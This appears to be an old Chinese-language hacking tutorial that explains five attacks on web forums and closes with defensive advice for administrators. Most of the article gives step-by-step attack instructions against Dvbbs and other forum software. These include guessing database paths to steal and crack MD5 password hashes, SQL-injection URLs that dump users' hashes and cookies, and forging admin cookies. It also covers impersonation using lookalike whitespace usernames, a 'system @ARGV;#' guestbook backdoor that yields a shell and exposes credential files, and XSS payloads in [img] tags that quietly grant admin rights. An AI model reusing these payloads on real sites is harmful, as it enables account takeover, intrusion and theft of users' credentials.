黑客入侵論壇各種手段大暴光
針對論壇的攻擊手段
第一招:霸王硬上弓破解論壇數(shù)據(jù)庫
目前很多國內(nèi)論壇都采用了動網(wǎng)先鋒引擎(一款由ASPSKY.NET開發(fā)和維護的asp論壇引擎)。要想控制整個論壇就得有管理員密碼,怎樣才能得到動網(wǎng)論壇的管理員密碼呢?黑客常用的招數(shù)之一是先獲得動網(wǎng)論壇的數(shù)據(jù)庫文件,然后再破解數(shù)據(jù)庫中的管理員密碼,不過該數(shù)據(jù)庫文件中的密碼是用MD5加密的,所以要使用工具軟件進行破解。舉個例子,黑客會可以先猜一下數(shù)據(jù)庫文件存放在哪個目錄里,如果猜對的話下載數(shù)據(jù)庫的成功率就比較高了。一般說來,管理員都有個習慣,就是給數(shù)據(jù)庫文件存放的目錄起個好記的名字,如data、database、bd、mdb等。所以黑客們可以在瀏覽器中輸入:http://www.target.com/database或http://www.target.com/mdb或者是http://www.target.com/db試試,如果顯示“HTTP錯誤404-找不到文件”,說明對方?jīng)]有這個目錄,再換一個目錄名試試,假設(shè)你輸入http://www.target.com/data,顯示“HTTP錯誤403-禁止訪問”,則說明對方有這個目錄,但是不允許我們?yōu)g覽該目錄,這樣就有希望了!
下一步只要有辦法找到數(shù)據(jù)庫文件并下載下來就有希望得到對方的管理員密碼。比方說,黑客可以使用漏洞掃描器X-SCAN掃描目標,看是否有漏洞,如果目標做了端口過濾,只開了80端口,我們可以這樣試試:把一些常用的數(shù)據(jù)庫地址如data.mdb、db.mdb、database.asp等添加到X-Scan的CGI數(shù)據(jù)庫中,或者用一些黑客字典來生成數(shù)據(jù)庫地址,然后單獨作一個數(shù)據(jù)庫,把它添加到X-Scan的CGI數(shù)據(jù)庫中。然后只掃描CGI漏洞,過一段時間掃描完畢,假設(shè)顯示的掃描結(jié)果為“/data/database.asp”,就表示我們成功地掃描到了數(shù)據(jù)庫文件?,F(xiàn)在用下載工具把數(shù)據(jù)庫下載下來即可,然后把文件擴展名改為.mdb。接下來就可以使用MD5的暴力破解程序和字典解出密碼。不要小瞧了這個辦法,許多人就是這樣破解了你的論壇管理員密碼!
第二招:溫柔一刀成為論壇管理員
仍舊以動網(wǎng)先鋒論壇為例。最近該論壇出現(xiàn)一個漏洞,使得普通用戶可以輕松地獲得論壇中任意用戶的密碼,包括管理員在內(nèi)!由于其#asp文件沒有過濾用戶提交SQL查詢的輸入,導致遠程攻擊者可以利用這個漏洞進行SQL攻擊,進而威脅論壇或服務(wù)器安全。注意,該手段對DVBBS VER 6.0.0及6.0.0 SP1、SP2都有效,對低版本的動網(wǎng)論壇也有效,而且無論數(shù)據(jù)庫是ACCESS還是MS SQL都通吃。
攻擊方法為:找到你的目標論壇,然后輸入其網(wǎng)址,假設(shè)為http://www.target.com/asp/dvbbs/index.asp,然后查詢管理員的名字,每個論壇中都有這樣的人,記住該人的論壇ID。接著在瀏覽器地址欄中輸入:http://www.target.com/dvbbs/#asp?orders=2&N=10,注意“N=”后面你可以隨意寫上任何數(shù)字,它表示你想查詢幾個論壇用戶,回車即可看到該論壇的用戶名(如圖1)??吹狡渲械墓芾韱T的名字了嗎?OK,接下來在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20userclass,”,這樣就會查到這些人在論壇中的身份(如圖2),注意其中的管理員身份的人,他具有最高權(quán)限,黑客的目標就是他。下一步,請在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20userid,”,回車后在你看到的窗口中(如圖3)記住管理員的ID在論壇中是第幾位注冊用戶,假設(shè)為1。再下一步,在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20userpassword,”,這樣你就會看到論壇中用戶的密碼(如圖4),可惜是經(jīng)過MD5加密處理的,但這已經(jīng)足夠了。最后再輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20usercookies,”,回車后在出現(xiàn)的窗口中(如圖5)記下管理員的usercookies的值,一般為0。好了,到現(xiàn)在黑客就得到管理員的Cookies的內(nèi)容了,他可以通過在本機中偽造管理員的Cookies來入侵論壇。如果你輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20quesion,”,還可以得到論壇中用戶忘記密碼時的密碼提示問題,輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20answer,”可以得到他的問題答案(也是MD5加密的)!
接下來在該論壇新注冊一個新用戶,然后用Cookies管理軟件(如iecv)改造自己在該論壇的Cookies。其實,這一步的目的就是通過Cookies來讓論壇以為你就是管理員,因為論壇判定是否是管理員的主要方法就是通過論壇ID和密碼來實現(xiàn)的,而Cookies中記錄的正是論壇ID和密碼,當然這個密碼是加密存放在Cookies中的。
運行Cookies管理軟件iecv,選擇“View”菜單下的“Obsolete cookie file”,就可以看到你的電腦中的Cookies文件了。由于你是新注冊的論壇ID,所以在iecv的主界面的最開頭就可以看到該論壇的Cookies文件,在它前面打上“√”,然后右鍵單擊界面中央的aspsky,選擇彈出菜單中的“編輯Cookie的內(nèi)容”(圖6),然后就可以編輯你的Cookies內(nèi)容了,把里面的內(nèi)容替換為你剛剛查到的內(nèi)容即可。最后關(guān)閉該軟件,并關(guān)閉瀏覽器,重新輸入該論壇的地址,進入后黑客就會成為該論壇的管理員了!此時這個論壇就在黑客的掌握之中了,干什么都可以隨心所欲了!
第三招:魚目混珠冒名發(fā)言
舉個例子,黑客可以在打開記事本后按下tab鍵或CapsLock+Tab鍵,這樣就會形成一個特殊的空格。復制該空格,用他想冒名發(fā)言的用戶名加上該空格注冊一個新用戶,這樣就會成功注冊一個和對方一樣的名字,接下來就可以冒名發(fā)言了,稍不留意別人就會上當。形成特殊空格還可以采用區(qū)位輸入法輸入aaaa或aaab或aaac。另外在html標簽里還可以使用 ( 就是顯示空白內(nèi)容的意思)制造一個特殊的空格。用區(qū)位輸入法輸入的aaaa/aaab/aaac在ASP編寫的程序里冒名的成功率極高,而tab鍵和 制造的特殊空格在php程序里成功率更高些。更可怕的是,在wdb論壇和ibb論壇,用Tab鍵構(gòu)造的特殊用戶名可以取得和原用戶相同的權(quán)限。如果原用戶名是管理員,那黑客構(gòu)造的這個冒名用戶也會變成管理員!
第四招:暗渡陳倉形成網(wǎng)頁后門
大家知道,在cgi或perl程序里如果寫入“system @ARGV;#”(注意輸入時沒有引號),就會形成一個有趣的網(wǎng)頁后門。在IE地址欄中輸入http://ip/*.pl?dir就會看到網(wǎng)站的物理目錄。以網(wǎng)上非常流行的Agbii免費cgi留言本為例,該留言本里的留言是以第n條留言的數(shù)目、用戶名、標題和內(nèi)容等等來排列的,而且留言都是按照順序排放在一個固定目錄data/用戶名下面的。說起來好像很復雜,讓我們來看圖7,假設(shè)這是黑客在Agbii免費cgi留言本中的留言,它是該留言本中的第14條留言,假設(shè)其注冊的用戶名是;system,標題為@ARGV;#,內(nèi)容則是“呵呵”,在data/222目錄下的14.pl的文件內(nèi)容就是如圖8所示。由于此留言本的用戶就是222,因此只要黑客在瀏覽器地址欄中輸入http://IP/book/data/222/14.pl?dir就會得到一個shell了(圖9)。注意這里的http://IP/book/是留言本的地址。得到shell之后,黑客還可以得到該管理員的密碼!只要在瀏覽器的地址欄中輸入“http://IP/book/data/管理員名字/14.pl?type+該留言本的物理目錄\user\管理員名字.cgi”就可以了。以本文為例,只要輸入“http://www.xxx.com/book/data/lxgyp/14.pl?type+d:\虛擬主機\web\book\user\lxgyp.cgi”就可以得到該管理員的用戶名和密碼、注冊時的郵件地址、他的網(wǎng)站地址、IP地址以及登陸時間,一目了然,盡在掌握!
第五招:太公釣魚進行跨站腳本攻擊
還有一種比較有趣也比較難利用的方法,其實就是所謂的跨站腳本攻擊。先說一個有趣的現(xiàn)象,在論壇中流行的UBB代碼中有一個bug,[img]和[/img]這對標簽是UBB代碼中經(jīng)常會用到的,用來引用一個圖片。在[img]和[/img]中如果插入的不是圖像而是javascript腳本它同樣會執(zhí)行!舉個例子,如假設(shè)你在某論壇中所發(fā)帖子內(nèi)容為:[img]javascript:alert("黑客")[/img],當有人點擊這個貼子就會彈出一個對話框。
如果把上面的內(nèi)容換為:[img]javascript:alert("黑客");self.open("http://url")[/img],則點擊后不僅會彈出一個對話框,而且還會打開一個新的網(wǎng)頁窗口。如果黑客在這個網(wǎng)頁里放入網(wǎng)頁木馬會怎么樣呢?答案是你會中木馬!不僅如此,利用這個辦法還可以使論壇中沒有任何權(quán)限的用戶提升為管理員!假設(shè)某論壇加新管理員hacker的url是http://ip/bbs/upadmin?user=hacker,由于這個url只有以管理員身份執(zhí)行才可以成功,所以你直接在地址欄中輸入是沒有任何用處的。但是利用剛剛提到的跨站腳本攻擊,只要黑客先注冊一個名為hacker的用戶,然后新建一個帖子,在里面寫入:[img]javascript:alert("黑客");self.open("http://ip/bbs/upadmin?user=hacker")[/img],然后給這個帖子起個醒目的主題,如“管理員論壇好像有大漏洞”,來引誘該論壇的管理員來查看此貼,當管理員點擊此貼后,hacker這個用戶就會提升為該論壇的管理員!同樣的道理,黑客還可以上傳一個txt附件,txt文件里就是那個加hacker管理員的url,由于IE瀏覽器存在一個問題,即只要文件里面含有html代碼就會執(zhí)行(IE才不理會后綴名是什么呢),所以論壇管理員只要點此txt附件,就會在論壇中增加一個名為hacker的管理員。如果對[img][/img]之間或txt附件里面的代碼進行精心偽造,黑客還可以讓論壇管理員在點擊帖子或txt附件后毫無察覺,所以很難防范。
之所以會出現(xiàn)論壇或留言板等遭受攻擊,關(guān)鍵是由于有漏洞存在,只要將這些漏洞堵上就沒有問題了。但是許多漏洞的存在是由于論壇或留言板編程時作者的疏漏所致,作為使用者是較難防范的,我們只能寄希望于作者早日解決這些問題。從這個角度來說,論壇管理員經(jīng)常給自己的論壇打補丁是必不可少的。應(yīng)該經(jīng)常留心各大黑客組織發(fā)布的漏洞公告,及時發(fā)現(xiàn)自己的論壇所存在的問題。再有,要嚴格過濾特殊字符,防止有人利用特殊字符進行攻擊。無論是管理員還是論壇中的普通用戶,都建議您能設(shè)置一個強壯的密碼,并定期更換,以防止別人暴力破解你的密碼。
針對論壇數(shù)據(jù)庫被人下載下來然后破解的問題,建議管理員能將論壇的數(shù)據(jù)庫文件改成一個沒有規(guī)律的復雜名字,并將擴展名由mdb改為asa,如3sdal9eklz9c0ad.asa,3sdal9eklz9c0ad.inc等,有點像用MD5加密過,對吧?同時還要將該文件放到深層目錄中,這樣在一定程度上可以減少被人下載的危險。
將數(shù)據(jù)庫database.mdb改成#database.mdb,這是最簡單有效的辦法。我們來解釋一下這樣做的好處:假設(shè)別人得到你的數(shù)據(jù)庫地址串將是:http://www.yourserver.com/yourfolder/#database.mdb,但實際上他得到是:http://www.yourserver.com/yourfolder/,因為#在這里起到間斷符的作用,地址串遇到#號,自動認為訪問地址串結(jié)束。注意不要設(shè)置目錄可訪問,用這種方法,不管別人用何種工具都無法下載。注:只要數(shù)據(jù)庫文件名任何地方含有‘#‘,別人都無法正常下載。同理,空格號也可以起到‘#‘號作用,但必須是文件名中間出現(xiàn)空格。
另外,還要使用Access軟件來為數(shù)據(jù)庫文件編碼及加密。首先選取 “工具→安全→加密/解密數(shù)據(jù)庫”,選取數(shù)據(jù)庫文件然后確定,接著會出現(xiàn)“數(shù)據(jù)庫加密后另存為”的窗口,確定后文件就會被編碼加密。以上的操作并不是對數(shù)據(jù)庫設(shè)置密碼,而只是對數(shù)據(jù)庫文件加以編碼,目的是為了防止他人使用別的工具來查看數(shù)據(jù)庫文件的內(nèi)容。接下來還可以為數(shù)據(jù)庫設(shè)置訪問密碼。首先打開經(jīng)過編碼的庫文件,在打開時,選擇“獨占”方式。然后選取功能表的“工具→安全→設(shè)置數(shù)據(jù)庫密碼”,接著輸入密碼即可。這樣即使他人得到了這個文件,沒有密碼也是無法看到內(nèi)容的。這樣就算黑客知道Access數(shù)據(jù)庫的名字也無法輕易下載,這種方法通常在租用別人服務(wù)器時使用。最后,建議您在IIS中把數(shù)據(jù)庫所在的目錄設(shè)為不可讀,這樣就可以防止文件被人下載了!
對于普通用戶而言,建議大家不要在論壇中留下真實的聯(lián)絡(luò)方式,如E-mail和QQ等,如果非要留下不可,論壇中你的密碼一定不要和其他密碼相同,免得被人順藤摸瓜,得到你的全部秘密!